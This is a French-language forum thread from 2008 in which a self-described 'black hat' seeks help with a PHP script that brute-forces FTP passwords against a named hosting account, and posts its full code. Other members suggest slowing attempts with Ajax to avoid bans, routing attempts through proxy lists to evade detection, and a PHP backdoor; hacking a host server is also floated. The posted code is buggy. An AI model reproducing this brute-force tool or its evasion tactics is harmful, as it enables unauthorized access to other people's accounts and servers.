Informatique-inside

Kautsky · 24-02-2008 14:29:32

j'essaye de coder une page qui se connecte a un serveur d'hebergement web via le protocole FTP( port 21 ) garce a un user ID et password biensur, mais je n'y arrive pas, pouvez vous me fournir un code d'exemple pour prendre l'exemple ? marci d'avance

Thibow · 24-02-2008 20:38:23

Salutation et bienvenu a toi l'ami !

Hm je vois ce que tu veux faire comme script ... Mais pourquoi ne pas utilisé un script de gestion de fichiers tout simplement, sous le principe d'une backdoor PHP mais protégé par htaccess ou autres ?

Sinon j'ai trouvé ce script assez intéressant je trouve

http://www.comscripts.com/scripts/php.p … .2041.html

Dis moi ce que tu en penses

Kautsky · 24-02-2008 22:04:37

bref => regarde là
c'est un cracker(brute forcer) en php ,je veu l'utiliser pour cracker les psw des comptes FTP perdu, et de pouvoir les reutiliser a nouveau, mais le brute forcing ne se genere plut quand j'ajoute mon code pour qu'il essaye les codes generé sur une host d'hebergement web gratuit via le protocle FTP (port 21)

Thibow · 25-02-2008 21:26:50

Aie en effet, de plus il va s'arrêter tout seul avec le timeout PHP

Hm, t'as pas essayer de passer par un autre support que PHP ?
Parcque pour cracker un mot de passe perdu, c'est pas ce qui se fait de mieux quoi :s

Kautsky · 26-02-2008 13:40:07

au debut du code de ce cracker il ya le code suivant

Code:

set_time_limit(0);

mais je croi que ta raison psk le timeout vient de la configuration du serveur
apart ça ? ta aucune idée pour m'aider ?

Dernière modification par Kautsky (26-02-2008 14:47:48)

Thibow · 26-02-2008 19:33:01

Wai le timeout se configure dans php.ini

Code:

; Default timeout for socket based streams (seconds)
default_socket_timeout = 60

Sinon pour ton problème, je vois pas trop sur ce coup, je suis pas encore assez calé pour t'aider :s
Je vais demander a un potoss de me mettre sur la route, désolé la :s

Kautsky · 26-02-2008 19:45:00

ok, pas de problem, je chercherai de l'aide ailleurs, sinon je peut utiliser ce code dans ma page pour fixer le timeout ou sa ne marchera pas ?

Thibow · 26-02-2008 20:10:52

Nah ça marchera pas, tu peux pas modifier les fonction PHP comme ça ...
Mais t'inquiete, je vais demander a un pote une petite aide

Il gere tout en php

Kautsky · 26-02-2008 20:14:18

merci d'avance.

Matt · 27-02-2008 06:12:56

Kautsky a écrit:
bref => regarde là
c'est un cracker(brute forcer) en php ,je veu l'utiliser pour cracker les psw des comptes FTP perdu, et de pouvoir les reutiliser a nouveau, mais le brute forcing ne se genere plut quand j'ajoute mon code pour qu'il essaye les codes generé sur une host d'hebergement web gratuit via le protocle FTP (port 21)

Doux rêve. Au premier ping le serveur t'a vu arriver avec ton algo brute forcer et ta quantité de tentatives (j'aimerai bien voir le code par curiosité, je le connais en C++ mais pas en php) et le serveur va te retirer la socket et bannir ton IP pour quelques minutes. Plus tu feras de tentatives, plus le banissement sera long.

Tu peux toujours essayer avec de l'Ajax (ajax pour rafraichir ta page), genre 1 tentative de connection toute les minutes. Tu gardes ton navigateur ouvert, et Ajax lance php toute les minutes qui lui fait 1 tentative de connection. Si la tentative reussi, le script t'envoi un email avec le code.

Reste a voir si le serveur avec 1500 tentatives par jour ne va pas bannir ton IP.

++

Kautsky · 27-02-2008 13:49:30

le problem c'est que je n'ai pas assez de temps pour laisser mon pc allumer a attendre le bruteforcing, sinon j'aurai utiliser un a partir de mon pc

Matt · 27-02-2008 14:02:37

oui, mais en y penant pour craker un pass il doit bien falloir quelques millions de tentatives avant d'y arriver.

Tu peux nous montrer le bout de code php de brute forcer ? si c'est possible

Kautsky · 27-02-2008 19:55:50

le voilà

Code:

<?php
set_time_limit(0);
$pw = array ('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','1','2','3','4','5','6','7','8','9','0');
$ok=1;
for ( $n=0; $n <= count($pw); $n++ ) 
{
    $passwordb= $pw[$n];
    openconnection($passwordb);
        for ( $x = 0; $x <= count($pw); $x++) 
        {
            $passwordb= $pw[$n];
            $tt = $pw[$x];
            $passwordb= $passwordb. $tt;
            openconnection($trypassword);
                for ( $z = 0; $z <= count($pw); $z++) 
                {
                    $passwordb= $pw[$n];
                    $tt = $pw[$x];
                    $tot = $pw[$z];
                    $passwordb= $passwordb. $tt.$tot;
                    openconnection($passwordb);
                    
                    sleep($ok);
                    
                        for ( $t = 0; $t <= count($pw); $t++) 
                        {
                            $passwordb= $pw[$n];
                            $tt = $pw[$x];
                            $tot = $pw[$z];
                            $tit = $pw[$t];
                            $passwordb= $passwordb. $tt.$tot.$tit;
                            openconnection($passwordb);
                                for ( $s = 0; $s <= count($pw); $s++) 
                                {
                                    $passwordb= $pw[$n];
                                    $tt = $pw[$x];
                                    $tot = $pw[$z];
                                    $tit = $pw[$t];
                                    $sos = $pw[$s];
                                    $passwordb= $passwordb. $tt.$tot.$tit.$sos;
                                    openconnection($passwordb);

                                        for ( $u = 0; $u <= count($pw); $u++) 
                                        {
                                            $passwordb= $pw[$n];
                                            $tt = $pw[$x];
                                            $tot = $pw[$z];
                                            $tit = $pw[$t];
                                            $sos = $pw[$s];
                                            $usr = $pw[$u];
                                            $passwordb= $passwordb. $tt.$tot.$tit.$sos.$usr;
                                            openconnection($passwordb);
                                        }
                                }
                        }
                }
        }
    }
function openconnection($passwordb) 
{
    echo $passwordb."<br>";

    $serveur_distant = "kautsky.ifrance.com";
    $port            = "21";
    $login = "kautsky_1";
    $pass = $passwordb;
    $conn_id = ftp_connect($serveur_distant, $port) or die('connection impossible à ' . $serveur_distant . '');
    if (ftp_login($conn_id, $login, $pass))
    {
        $dossier_courant = ftp_pwd($conn_id);
        echo 'un ftp tout chaud rien que pour toi, pass:' . $pass . ' login: ' . $login . '\n';
        echo 'dossier courant: ' . $dossier_courant . '';
    }
    else
    {
        echo "sorry man but il y à une erreur d'authentification";
    }
}
?>

je me suis inspirer d'un code déja existant, mais je le trouve bordélique quand même ^^

Dernière modification par Kautsky (27-02-2008 20:00:04)

Thibow · 27-02-2008 21:03:41

Bah wai le problème qui va se paser ici, c'est que tu vas devoir attendre des millions d'années avant de réussir a brute forcer ton pass ...

Moi j'avais pensé a autre chose, malheuresement le code doit vraiment pas être simple a codé, et ce n'est rien de le dire ... par contre ton brute force serait vraiment efficace.

Trouve toi des liste de proxy, un maximum possible, et créé un script PHP qui va faire envoyé t'as requete part chaque connexion proxy ...

Je sais pas trop si tu vois le principe ^^

Kautsky · 28-02-2008 11:25:51

envoyer les requettes (contenand le psw ) a partir d'autres serveurs ( proxys ), ce qui menera a gagner un grand nombre de temps qui depend de nombre de proxys utilisé. c ça ?!

Thibow · 28-02-2008 21:15:31

Wai c'est le principe auqeul j'avais pensé quoi

Kautsky · 29-02-2008 11:50:11

moi je pense a hacker un serveur ( d'hebergement ) et modifier sa config pour qu'il n'interompe pas mon code, je croi que c'est bien, non ?

Thibow · 29-02-2008 23:27:38

Heuu ... ^^
Mdr, c'est pas légal tout ça !

Kautsky · 01-03-2008 14:25:47

je vous ai deja dit que je suis un black hat... mais je compte hacker un serveur seulment comme derniere option...

Informatique-inside

#1 24-02-2008 14:29:32

connexion via le protocole ftp(port 21)

#2 24-02-2008 20:38:23

Re: connexion via le protocole ftp(port 21)

#3 24-02-2008 22:04:37

Re: connexion via le protocole ftp(port 21)

#4 25-02-2008 21:26:50

Re: connexion via le protocole ftp(port 21)

#5 26-02-2008 13:40:07

Re: connexion via le protocole ftp(port 21)

Code:

#6 26-02-2008 19:33:01

Re: connexion via le protocole ftp(port 21)

Code:

#7 26-02-2008 19:45:00

Re: connexion via le protocole ftp(port 21)

#8 26-02-2008 20:10:52

Re: connexion via le protocole ftp(port 21)

#9 26-02-2008 20:14:18

Re: connexion via le protocole ftp(port 21)

#10 27-02-2008 06:12:56

Re: connexion via le protocole ftp(port 21)

Kautsky a écrit:

#11 27-02-2008 13:49:30

Re: connexion via le protocole ftp(port 21)

#12 27-02-2008 14:02:37

Re: connexion via le protocole ftp(port 21)

#13 27-02-2008 19:55:50

Re: connexion via le protocole ftp(port 21)

Code:

#14 27-02-2008 21:03:41

Re: connexion via le protocole ftp(port 21)

#15 28-02-2008 11:25:51

Re: connexion via le protocole ftp(port 21)

#16 28-02-2008 21:15:31

Re: connexion via le protocole ftp(port 21)

#17 29-02-2008 11:50:11

Re: connexion via le protocole ftp(port 21)

#18 29-02-2008 23:27:38

Re: connexion via le protocole ftp(port 21)

#19 01-03-2008 14:25:47

Re: connexion via le protocole ftp(port 21)

Pied de page des forums